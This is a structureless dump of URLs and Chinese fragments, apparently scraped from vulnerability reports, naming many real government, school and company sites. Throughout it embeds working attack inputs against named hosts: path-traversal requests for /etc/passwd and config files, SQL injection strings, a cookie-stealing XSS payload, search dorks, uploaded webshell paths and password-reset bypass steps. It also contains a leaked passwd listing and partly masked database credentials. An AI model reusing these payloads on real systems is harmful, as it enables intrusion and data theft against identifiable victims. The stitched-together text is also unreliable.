http://shuaiyuchugui.com/Product_Show.aspx?index=157 http://zzxx.nankai.edu.cn/NPELS rsync://122.228.76.54/backup/game1/root/gamed/ rsync://122.228.76.54/backup/game1/root/gamed/lottery.lua http://xxgcx.hbsi.edu.cn/ewebeditor/db/ewebeditor.mdb http://220.115.251.77/index.action https://github.com/haryzhou/zstl/blob/a93bb1646731961d32bba2a02dea056c5a3698b5/conf/zstl.conf http://58.199.193.57:8080/gxwssb/,通过贴吧获得某人学号(12******15),点击忘记密码(部分版本没有忘记密码这个链接),在密码答案处,直接输入000000(000000是系统默认配置),点击确定,密码即被重置为学号 http://58.199.193.57:8080/gxwssb/addhunansjwj?filename=6129test.xls http://58.199.193.57:8080/gxwssb/addhunansjwj?filename=wooyun.jsp http://58.199.193.57:8080/gxwssb/sjwj/wooyun.jsp http://58.199.193.57:8080/gxwssb/sjwj/7348test.jsp http://58.199.193.57:8080/gxwssb/fileDownloadmodel?name=../WEB-INF/web.xml http://www.runoqd.com/admin/Login.aspx http://www.plateno.com/ http://sso.info.xinhua.org/aaa/login.do http://online.scuec.edu.cn/phpadmin/ http://www.rzdonggang.gov.cn/ycportal/jsp/log/index.jsp http://www.jxfdacdc.cn/ycportal/jsp/log/index.jsp http://www.dtycgs.cn/ycportal/jsp/log/index.jsp http://121.30.232.54:9080/ycportal/jsp/log/index.jsp http://sxlfyc.com/ycportal/jsp/log/index.jsp http://www.lvlyc.com.cn/ycportal/jsp/log/index.jsp http://59.53.245.105/ycportal/jsp/log/index.jsp http://szycgs.cn/ycportal/jsp/log/index.jsp http://www.rzdonggang.gov.cn/ycportal/jsp/explorer/backpic.jsp http://www.jxfdacdc.cn/ycportal/jsp/explorer/backpic.jsp http://www.dtycgs.cn/ycportal/jsp/explorer/backpic.jsp http://121.30.232.54:9080/ycportal/jsp/explorer/backpic.jsp http://sxlfyc.com/ycportal/jsp/explorer/backpic.jsp http://www.lvlyc.com.cn/ycportal/jsp/explorer/backpic.jsp http://59.53.245.105/ycportal/jsp/explorer/backpic.jsp http://szycgs.cn/ycportal/jsp/explorer/backpic.jsp http://www.govinfo.so/news_info.php?id=33251 http://stu.math.sdu.edu.cn/cms/login.php Description:You http://lukuang.mapbar.com/wxlukuang2/tmc2?pid=../../../../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././passwd%00.htm http://www.kyzz.com.cn http://f.dangdang.com/ http://f.dangdang.com/person/6898509240848/ http://27.223.70.55:88/haier/index.php http://huawei.imagchina.com/huawei.weixin/home/wall/step_two?id=[object%20HTMLInputElement]&from=timeline&isappinstalled=0 http://bailing.iyiyun.com/,此站点是一个dedecms的站点,之前做指纹收集的时候,收集到了该站点。 gys.zon100.com/qyhy/template/mb1/qyhy.jsp?id=222 http://wall.easou.com/.svn/entries http://srm.hisense.com:8001/SRMWeb/ http://srm.hisense.com:8001/SRMWeb/Error.aspx?entrytype=RULE1 https://github.com/momoplan/wap/blob/6550fc09c3b1d638b0b62e11c425b37f26f968c6/conf/test/.svn/text-base/jrtWAPSite.properties.svn-base https://github.com/jinstrive/hack_flavor/blob/cc9310b651e1eb0bf1ed17c1773fec2751ad841a/server/conf/settings.py coding:utf-8 http://www.eshop-ftms.com/userset.aspx?uid=156&utid=1 http://www.eshop-ftms.com/userset.aspx?uid=156&utid=1 http://srm.hisense.com:8001/SRMWeb/ com:8001/SRMWeb目录 http://srm.hisense.com:8001/SRMWeb/3.txt http://www.dztjw.gov.cn/admin/Admin_Login.asp http://boc.lyg.gov.cn/Japan/second.aspx?folderId=200001 http://boc.lyg.gov.cn/English/second.aspx?folderId=100001 http://218.75.120.153:8080/zjzsonline/protocol.do http://www.zhongguowangshi.com/scencelist.aspx http://zgws.xinhuanet.com/scencelist.aspx http://**.**.**/datareport/login_loginAutoDomain.action_ http://**.**.**/bsweb/login.action_ http://ekp.lc.haier.com:81/message.do http://itpx.haier.com/database/bup.asp http://itpx.haier.com/database/bak/ http://fw.rrs.com/snaplb/anonymous/topic/portal/b9d68cdc-46e8-4b69-bfe4-f7f5c06d2d80?topicTypeId=2 http://www.neverwinterol.com.cn/login!login.action www.173.com http://qingyuan7.com/cctrl/backup/index.php jiwei.hebau.edu.cn/list.php?cid=5 inurl:qtdisp.asp?disp_id= http://oa.bzrkjs.gov.cn/qtdisp.asp?disp_id=1522 http://www.clhszxx.cn/gwqs/qtdisp.asp?disp_id=1488 http://www.84891.com/qtdisp.asp?disp_id=1149 http://www.pw8.cn/qtlist.asp?id=17 http://www.cjkchina.net/qtlist.asp?id=362 http://www.zdct.cn/gwqs/qtlooker.asp?look_id=1231 http://www.wjszxx.com/documents/qtlooker.asp?look_id=4664 http://tz.jz.qdedu.net/qtlooker.asp?look_id=9791 http://qpb.uodoo.com/api/task?task_id=4481e69bb2404d3b8741c7b67ebb997a site:rjjy.gov.cn filetype:xls http://mi.qianlong.com/,存在sql注入,权限分配不当,网站配置不当导致爆路径 http://zsjggw.xnu.edu.cn/bluelist.aspx?qnum=1 http://p.hsort.com/bluelist.aspx?qnum=1 http://dztb.cufe.edu.cn/bluelist.aspx?qnum=1 http://epaper.btwhw.com/bluelist.aspx?qnum=1 http://182.129.150.10:8001/model/TwoGradePage/equipmentlist.aspx?columnId=92&pid=89&clname=%u8bbe%u5907%u67e5%u8be2 http://182.129.150.10:8001/model/TwoGradePage/labmore.aspx?columnId=18&pid=17&clname=%u5b9e%u9a8c%u5ba4%u9884%u7ea6 http://182.129.150.10:8001/index.html http://sopbbs.suning.com/config/config_global.php.1 http://61.129.250.80//workorder-web/wod/onlineCompla/checkList.html http://61.129.250.80 http://f.lefeng.com/ http://english.swjtu.edu.cn/public/viewNews.aspx?ID=154 http://sms.ycxcxx.com/ http://mobilephone.keepc.com:2009/charge?src=35&kcid=116353269&paytype=31&goodstype=2&money=30 http://web.gdupt.edu.cn/shekebu/new/data/afds98.php http://mail.sh.cn/ http://mail.sh.cn/NewMailSh/smmail/jsp/Portal/Lqxx.jsp?sKeyword= http://bbs.smmail.cn/bbs/smmail/jsp/main/index.jsp) https://jinshuju.net/forms/QHzTX7/es_my_entries/detail_index?page=1 https://jinshuju.net/forms/QHzTX7/es_my_entries/detail_index?page=2 https://jinshuju.net/forms/QHzTX7/es_my_entries/detail_index?page=62 jinshuju.net/f/ http://club.alipay.com/simple/index.php?t10774135.html http://182.131.21.49:8080/newsDetail.aspx?Channel=1461120347 http://vfs.zjweu.edu.cn/sports/web/admin/Jv_login.asp http://www.hateacher.edu.cn/upload/003013014/20075632359110.jsp http://www.fmtaobao.com/admin inurl:IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoshan/IndexViewController.do?method=index http://www.hszgj.cn/IndexViewController.do?method=index http://kszfcg.gov.cn/IndexViewController.do?method=index http://www.szzfcg.gov.cn/IndexViewController.do?method=index http://www.ydzfcg.gov.cn/IndexViewController.do?method=index http://ztb.taihe.gov.cn/IndexViewController.do?method=index http://www.qdkfqcg.gov.cn/IndexViewController.do?method=index http://www.fcxzfcg.gov.cn/IndexViewController.do?method=index http://www.lbzfcg.gov.cn/IndexViewController.do?method=index http://cgzx.ahzfcg.gov.cn/IndexViewController.do?method=index http://www.tlzbcg.com/IndexViewController.do?method=index http://www.sxzfcg.gov.cn/IndexViewController.do?method=index http://www.sixianzfcg.gov.cn/IndexViewController.do?method=index http://222.216.4.8/IndexViewController.do?method=index http://www.jimozfcg.cn/IndexViewController.do?method=index http://www.jzzfcg.gov.cn/IndexViewController.do?method=index http://218.22.70.134:85/IndexViewController.do?method=toLogin http://www.xxzfcg.gov.cn/IndexViewController.do?method=index http://www.hnzfcg.gov.cn/IndexViewController.do?method=index http://www.mczb.gov.cn/IndexViewController.do?method=index http://hscgw.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/yeji/IndexViewController.do?method=index http://www.lazfcg.gov.cn/jinan/IndexViewController.do?method=index http://www.lazfcg.gov.cn/shucheng/IndexViewController.do?method=index http://www.lazfcg.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoqiu/IndexViewController.do?method=index http://lbzfcg.gov.cn/IndexViewController.do?method=index http://mczb.gov.cn/IndexViewController.do?method=index http://zfcg.mccz.gov.cn/IndexViewController.do?method=index http://caigou.pingdu.gov.cn/IndexViewController.do?method=index http://zfcg.laoshan.gov.cn:88/IndexViewController.do?method=index http://www.aqzfcg.gov.cn/IndexViewController.do?method=index http://www.yqzfcg.cn/IndexViewController.do?method=index http://www.cngpc.com/IndexViewController.do?method=index http://lazfcg.gov.cn/IndexViewController.do?method=index http://60.171.34.186/IndexViewController.do?method=index gczfcg.gov.cn/CmsNewsController.do?imgUrl1=../../../../../../../../../../etc/passwd&method=showImg gczfcg.gov.cn/CmsNewsController.do?imgUrl1=../WEB-INF/classes/db/hibernate.properties&method=showImg http://www.hnzfcg.gov.cn/CmsNewsController.do?imgUrl1=../../../../../../../../../../etc/passwd&method=showImg http://www.hnzfcg.gov.cn//CmsNewsController.do?imgUrl1=../WEB-INF/classes/db/hibernate.properties&method=showImg http://106.3.37.71/UserLoginAction/huiyuanLogin.action http://www.lankecms.com inurl:eshownews.asp?id= inurl:showshop.asp http://www.ampixel.com/eshownews.asp?id=61 http://ampixel.com/eshownews.asp?id=62 http://www.up-real.com/eshownews.asp?id=106 http://www.trendtronic.com.cn/eshownews.asp?id=65 http://www.jeffhouse.net/eshownews.asp?id=103 http://www.sdrunzhou.com/showcases.asp?id=60 http://www.planning.org.cn/news/shownews.asp?id=471 http://www.ttlg.com/shownews.asp?id=895 http://www.asmcs.com/shownews.asp?id=492 http://www.3dxchina.com/shownews.asp?id=100 http://www.up-real.com/showshop.asp?id=72 http://www.jdart.cn/showshop.asp?id=169 http://www.ospchina.com/showshop.asp?id=63 http://bbs.9377.com/home.php?mod=space&do=profile&uid=1223 http://www.9377.com/login.php?do=login&gourl=http://www.9377.com&password=密码&username=用户名(已拿到的) http://106.3.37.9:8080/ URL:http://www.bjsdermyy.com/newshow.php?id=1117 http://www.bjsdermyy.com/newshow.php?id=1117 http://www.bjsdermyy.com/newshow.php?id=1117 http://www.czmz.gov.cn/download.asp?filename=download.asp http://support1.lenovo.com.cn/lenovo/wsi/usercenternew/userinfo/detail.aspx?lenovoid_id=341547&DoRefreshUrl=http%3a%2f%2fdianping.lenovo.com.cn%2fPages%2fPC%2fUserCenter%2fRefreshPage.html http://017.kouyu100.com/zywxx/forgetPWD.action?domain=zywxx http://www.17u.net/plane/jpresult.asp?ddlOrgCity1=PEK&ddlDesCity1=SHA&txtGoDate=2014-12-18 http://222.35.36.235:9901/login.jsp http://127.0.0.1/tipask/tipask/?user/profile.html http://www.yinlu.com/login.aspx http://**.**.**/s/1dD0Bd9R http://s.haier.com/haierproject/fankui-new/fankui/new/pinglun.php?aid=6&fen=5&uid=&username= http://www.yeepay.com/individualservice/Login.action http://www.yeepay.com/individualservice/Login.action?redirect:/xxoo http://www.yeepay.com/individualservice/xxoo http://www.yeepay.com/individualservice/Login.action?java.io.File http://www.yeepay.com/individualservice/Login.action?java.io.PrintWriter http://www.hospital-cqmu.com/k/lnk/index.php?file=zxdt&smid=55&zxid=262存在SQL注入漏洞 http://www.hospital-cqmu.com/index.php?file=1 http://cx-5.changan-mazda.com.cn/market/2014sky/?id=171 http://106.3.37.121/ http://ehr.cofco.com/ https://home.cofco.com/dana-na/auth/url_default/welcome.cgi https://home.cofco.com/entsmsfront/,DanaInfo=sms.cofco.com+indexAction.do http://drvdisc1.lenovo.com/bak/Default.aspx?key=1 http://www.peopledigital-sh.com.cn/ http://www.peopledigital-sh.com.cn/service1.aspx?aid=12 http://www.peopledigital-sh.com.cn/manager/Login.aspx http://www.povos.com.cn/cn/index.aspx http://pcp.povos.com.cn/6s_detail.jsp?id=10023 http://www.povos.com.cn/admin/ https://ipgpassport.lenovo.com/security/forgetPassword.action https://tender.wanda.cn/COST https://tender.wanda.cn/COST/contractweb/forgetpd.aspx http://sms.womai.com/login.aspx http://payadmin.pateo.com.cn/ inurl:www.kaiyuan.eu/?go=order http://99.zhaopin.com http://kdjyxk.post.gov.cn/companyLogin.jsp inurl:ah.189.cn/order inurl:xyadmin http://lflc.hbmu.edu.cn/ http://gxb.hbmu.edu.cn/ http://www.blyzms.com/ http://zhaosheng.sdzy.cn/html/ http://bllfzx.com/ http://www.hssxfl.com/hssxfl/ http://www.cygjyzx-edu.com/ http://www.scwyzjx.com/ http://wchyyy.gotoip2.com/ http://www.ptxez.com/ http://pj.akvtc.com/ http://www.bxxy.com/sonsite/mag_dep/ http://comment2.rayli.com.cn/manage/ http://www.jit.com.cn/ http://218.27.140.5/zwdtSjgl/Manual/Manual.jsp?depid=013524006 http://218.62.100.33:8000/zwdtSjgl/Manual/Manual.jsp?depid=01361537-0 http://122.141.66.213/zwdtSjgl/Manual/Manual.jsp?depid=013571777 http://222.160.175.90/zwdtSjgl/Manual/Manual.jsp?depid=01358800-x http://222.160.140.29:8000/zwdtSjgl/Manual/Manual.jsp?depid=013581895 http://mail.fuck.com:8080/enterprise/swfupload/swfupload/swfupload.swf?movieName=%22%5d%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;// ftp://113.107.172.62/即可 http://www.gzzyy.com/Index/index.php/Show/picDetail/no/1251698837/id/1809 http://www.gzzyy.com/Index/index.php/Show/picDetail/no/1251698837/id/1809 http://www.gzzyy.com/Index/index.php/Show/picDetail?no=1251698837&id=1809 http://www.gzzyy.com/Index/index.php/Show/picDetail?no=1251698837&id=1809 http://101.231.159.185:8080/index.html www.buaa.edu.cn www.ly.com http://www.gdphone.net/admin/Menu.htm,在友情链接那里不用登陆就可以上传webshell, http://www.gdphone.net/img_link/20141222072016.aspx。 http://localhost/a.php?aid=x1 http://bailing.iyiyun.com/plus/download.php http://192.168.4.70/dedecms5.7/dedecms5.7-20110624/uploads/plus/recommend.php http://192.168.4.70/a.php?aid=1%s%20union%20select%201%20from%20table https://github.com/ydf/StaticServer/blob/b1ddfc0ef498d9e009ddb8536cad2465cb60c661/settings.py sqlite:/// mysql://root:3***@42*******7:3**8/wiplatform mysql://work:3***@42*******7:3**8/usertest mysql://work:3***@42*******7:3**8/test'widash-test.wiwide.com https://passport.wiwide.com http://m.cheyipai.com/#6 http://mcbbs.kuaikuai.cn/forum.php http://www.268v.com/ http://train.268v.com/ http://train.268v.com/Report/ReportList.aspx?VIN=LBEMCACA66X030197&License=%E4%BA%ACK36856&Id=401636%20and%201=%28select%20@@VERSION%29 http://mail.qq.com/cgi-bin/login?vt=passport&vm=wsk&delegate_url http://www.chinapost.com.cn/TextLives.do?act=loadMore&sql= http://10.10.1.61:9000/complain/advisory/view.do?adviId=6874 http://sswz.chinapost.gov.cn/complain/advisory/view.do?adviId=6874 http://sswz.chinapost.gov.cn/complain/advisory/view.do?adviId=6875 http://sswz.chinapost.gov.cn/complain/advisory/ http://www.wooyun.org/bugs/wooyun-2010-087806 http://**.**.**/bugs/wooyun-2010-026771_ http://**.**.**/corps/%E6%B5%B7%E5%B0%94%E9%9B%86%E5%9B%A2 http://ebooking.17u.cn http://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=baidu&wd=团购对账详情-同程酒店管理系统&rsv_pq=db17877800001a17&rsv_t=484ear5Gp7N7iYCdFzaNulIeXgurqqiEz47GHeHuAtJQ7myYbnb9wVnpqTE&rsv_enter=1&rsv_n=2&rsv_sug3=1&rsv_sug2=0&inputT=312 http://ebooking.17u.cn/hotelgroupbuy/groupbuytakeoffconfrim?serialid=t140401004769 http://ebooking.17u.cn/hotelgroupbuy/groupbuytakeoffconfrim?serialid=t140401004770 http://ebooking.17u.cn/hotelgroupbuy/groupbuytakeoffconfrim?serialid=t140401004771 http://www.baidu.com/s?wd=尾房销售-同程酒店管理系统&ie=utf-8 http://ebooking.17u.cn/同程ebooking操作指南.pdf http://218.58.70.220/Protype/ http://218.58.70.220/Protype/uploadfiles/20141220231624.asa http://www.bjgold.com.cn/index.action http://116.204.96.198:8822/ http://1.202.136.201:8080/manager/html http://www.kysec.cn/CListShow.aspx?ColID=13&GUID={0F839366-88D9-4FA9-8E8E-725917239264}存在sql注入漏洞 http://www.hhhtbtjc.com/swzl/view/readswzl.jsp?id=L201410090002 http://www.hhhtbtjc.com/swzl/view/addswzl.jsp?id=L201410200001 http://extra.lenovo.com http://extra.lenovo.com/ams/view.php?id=18 http://whitehat007.blog.sohu.com/ http://pis.hebrkjsw.gov.cn/ http://kc.cheyipai.com/page/car.aspx?b=&c=&t=-1&m1=&m2=&y1=&y2= http://125.64.8.10/index.php?m=admin&c=index&a=login&pc_hash=cQ9Wgy http://rtx.minshengec.cn:8012” http://rtx.minshengec.cn:8012/admin.php http://www.jit.com.cn/ http://218.27.207.22/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://61.232.168.107/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://zwgk.wangqing.gov.cn/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://218.62.100.33:8000/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://218.62.90.168/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://kc.cheyipai.com/page/carInfo.aspx?id=1407525 http://rsc.ustb.edu.cn/page.asp http://rsc.ustb.edu.cn/page.asp http://rsc.ustb.edu.cn/page.asp http://oetc.imooc.com/ http://xinche.taotaocar.com/xinche/quanguobaojia.aspx?classid=161011001 http://tieba.baidu.com/toutu/addContent http://tieba.baidu.com/p/3288419523 inurl:gn.asp?m= http://219.139.35.98:98/ http://61.167.199.246/jmc/ http://jw.hnsfjy.net/ http://www1.tyust.edu.cn/yuanxi/jsjg/ http://tw.lmu.cn/ http://210.26.80.118/jpkc/shyj/ http://spp.sunits.com/ http://uc.sunits.com/index.php?m=content&c=index&a=show&catid=6&id=137%27 http://home.sunits.com/ http://www.starbucks.com.cn/web.rar http://cms.starbucks.com.cn:8888/ http://m.taotaocar.com/paimai/index.aspx inurl:buy.asp?action=show inurl:viewreturn.asp?Page= http://www.0830fh.com/ http://www.yzshejiu.com/ http://www.2000textile.com/ http://www.jmally.com/ http://www.nkdz.org/ http://www.muziwang.com/ http://jiuye.hebau.edu.cn/danganchaxun/excel/index.php http://oracle.taiji.com.cn:8080/docs/funcspecs/5.jsp http://www.yqdaxx.org/docs/funcspecs/5.jsp http://xyzh.sau.edu.cn/docs/funcspecs/1.jsp http://journal.9med.net/qikan/article.php?id=196966 http://sp.wissun.com/,访问网页跳转到:http://sp.wissun.com/meeting/app/meetinglist/todayDataList.action?menuname=24000_24001_24002,如图所示: http://www.xhsd.cn/book/MusicAttributeor.jsp http://www.minjiao.com/ http://web.ptjy.com/web/web_programs_dotnet/adminmanage/Default.aspx http://www.zzyxjy.com/Web/Web_Programs_DotNet/adminmanage/Default.aspx http://school.mwedu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx http://school.gledu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx http://school.zzlwjy.com/web/web_programs_dotnet/adminmanage/Default.aspx http://school.fjhajy.net/web/web_programs_dotnet/adminmanage/Default.aspx http://schoolweb.ctjy.net/web/web_programs_dotnet/adminmanage/Default.aspx http://school.fjjyjy.net/web/web_programs_dotnet/adminmanage/Default.aspx http://www.ptedu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx www.qledu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx inurl:cms/whatycms http://training.cnca.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ http://www.teach-in-china.com.cn/hd.aspx?id=2 http://www.bioce.zjut.edu.cn/news_surface.asp?id=105 http://www.bioce.zjut.edu.cn/admin1/index.asp http://mclub.migu.cn/ucenter/admin.php http://wooyun.org/bugs/wooyun-2014-088099 http://webmail30.189.cn/w2/option/addFilter.do?name=all&condition=3005&senderInclude=1001&sender=&subjectInclude=1001&subject=&sizeCompare=1007&mailSize=&action=0&setLabelId=41167481&setBoxId=1&autoForward=test%40test.com&autoReply=&id=-1 https://e.189.cn/iframe/modifyAlias.do http://www.teemai.com/teemai.zip http://www.teemai.com/index.php?g=coyouda http://www.ahpfpc.gov.cn/TPL2006N/zzjg.php?name=%D2%A9%BE%DF%D5%BE http://www.ahpfpc.gov.cn/TPL2006N/zzjg.php?name=%D2%A9%BE%DF%D5%BE http://www.rsc.zjut.edu.cn http://www.rsc.zjut.edu.cn/upfile.asp http://www.rsc.zjut.edu.cn/Detail.asp?replyID=126 http://www.rsc.zjut.edu.cn/admin.asp http://www.jit.com.cn/ http://218.86.25.110:8080/interlib/common/ http://wooyun.org/bugs/wooyun-2014-062374 http://wooyun.org/bugs/wooyun-2014-066075)即可查看他人卡扇区密码,使用UID卡任意制作他人的卡片,随意消费了,而不需要物理接触到他人卡片。 http://mall.pigai.org/ http://www.asdht.com/ http://tuan.eduts.com/biz/login.aspx http://tuan.2760391.cn/biz/Login.aspx http://www.ndtuan.com/biz/login.aspx http://m.5izi.com/biz/login.aspx http://benear.net/biz/login.aspx http://tg.mm315.cn/biz/login.aspx http://www.pxtb.org//biz/login.aspx http://jiaodatuan.com/biz/login.aspx http://www.tongluowan.com/biz/login.aspx http://tuan.hk360buy.com/biz/login.aspx http://www.mtuan365.com/biz/login.aspx http://tuangou.yongyao.net/biz/login.aspx http://www.vlvyou.com/biz/login.aspx http://xss.re/6966 http://xss.re/6966 view-source:http://www.zzkscx.com/sysweb/admin_list.aspx可看到全部用户名,以及重置用户密码的方法,直接访问http://www.zzkscx.com/sysweb/resetKeyWord.aspx?userid=root,可直接修改最高权限账号密码,从而访问系统(登陆页面http://www.zzkscx.com/Login.aspx)获取信息 http://union.ly.com http://www.xcfdc.gov.cn/news.asp?bd=7 http://www.ibox.com http://go.ly.com/user/message/ www.17u.com https://gamma.designcenter.hp.com/cgi-bin/gamma2/client/gatekeeper.cgi http://go.wiwide.com/s/suser.php http://go.wiwide.com/download/dbw090331041030.sql http://go.wiwide.com/cache/password.file http://go.wiwide.com//test/PHP.zip http://go.wiwide.com/media/v1/css/mobile/.svn/entries http://210.75.220.222/csls/ https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/IdentityVerification.aspx http://widash.wiwide.com/.svn/entries http://widash.wiwide.com/php.php http://widash.wiwide.com http://widash.wiwide.com http://42.159.152.171/svn/dash/tags/20141030/src/www http://42.159.152.171/svn/dash http://open.shopex.cn/docs/api_search/?method_type_id=22&docs_keyword=&platform_id=0 http://widash.wiwide.com/login/ http://t.hb.189.cn/ http://59.252.133.3/tabid/61/Default.aspx?returnurl=%2fDefault.aspx http://liantong.cheyipai.com www.96225.com存在命令执行漏洞struts2,容易导致数据库泄露,控制其他服务器。 https://www.96225.com/smkwebgate/page/consumePay.action http://write.blog.csdn.net/feedback?del=4630019 http://hqfwgs.lstc.edu.cn/files/index.php?id=355 http://www.sinotrans.com/vc/vc/para/opr_initvc.jsp?webid=1 http://www.sinotrans.com/vc/vc/para/opr_initvc.jsp?webid=1 http://zs.baiyin.cn/spplay.asp?ArticleID=4390 http://wooyun.org/bugs/wooyun-2010-02959 http://www.cd-rail.cn/RailWay/Search?s= ip:54.167.122.231 port:27016 http://www.xncg.gov.cn/plus/ajaxs.aspx?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 http://www.yishion.com.cn/workdetail.php/workdetail.php?id=1 http://wiki.w31.cn/bbs/uc_server/ http://w31.cn http://wiki.w31.cn/wiki/images/f/f3/1.php http://wiki.w31.cn/bbs encap:Ethernet addr:10.**.**.** Bcast:10.**.**.** Mask:255.255.254.0 Scope:Link MTU:1500 packets:23062 packets:35055 txqueuelen:1000 http://123.130.246.26:9080/wscgs/xwl.do http://60.211.179.22:9080/wscgs/xwl.do http://www.bzwscgs.com:9080/wscgs/xwl.do http://www.lcwscgs.com/wscgs/xwl.do http://221.2.145.164:9080/wscgs/xwl.do http://58.59.39.43:9080/wscgs/xwl.do http://www.lycgs.gov.cn:9080/wscgs/xwl.do http://218.59.228.162/wscgs/xwl.do http://218.59.228.162/wscgs/xwl.do http://fec.sicnu.edu.cn/进行测试 http://fec.sicnu.edu.cn/soft.asp http://www.gygsl.gov.cn/Admin/admin_login.aspx http://m.cheyipai.com/api/download?t=apk&file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html http://imgcache.qq.com/qqshow_v3/htdocs/inc/header.html http://imgcache.qq.com/qqshow_v3/htdocs/inc/sidebar.html http://202.120.1.51:8086/ http://202.120.1.51:8086/sysmenumg/loadIndexMain.action存在sturts2 http://widash-test.chinacloudapp.cn/login/ http://www.haixindichan.com/ http://ccd.jxfda.gov.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://119.163.120.215/ http://119.163.120.182:8080/ http://iweidu.renren.com/bbs/ http://www.bankzs.com/admin/mailbox/loan!search.action http://www.mogu.io/ http://www.mogu.io/user/list http://mail.zhenai.com/src/login.php http://mail.ea3w.com/login.php?Lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://dd.game.pps.tv/index.php?m=front&c=bhzr_zlindex&a=bhzr_zldetail&id=1806&fid=192 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin webid:x:500:500::/home/webid:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin zabbix:x:502:502::/home/zabbix:/sbin/nologin mysql:x:503:503::/usr/mysql:/bin/bash http://www.yylq.gov.cn/x.aspx ip:222.242.228.187 http://www.yynanhu.gov.cn/2.txt http://www.yycoop.com/2.txt http://www.yunxiqu.gov.cn/2.TXT http://www.leyou.com.cn/special/mall/Stores.php?id=461 http://play.easou.com/stc.e?bk=kdinfo3&infoId=5749&esid=oqxD9xCag9L&wver=c&qn=33&fr=33.10.1253.2.1.5749&version=c http://play.easou.com/stc.e?bk=kdinfo3&infoId=5749&esid=oqxD9xCag9L&wver=c&qn=33&fr=33.10.1253.2.1.5749&version=c http://www.flyhigh.com.cn/admin.php?ctrl=admin&ac=adminUserUp&id=1 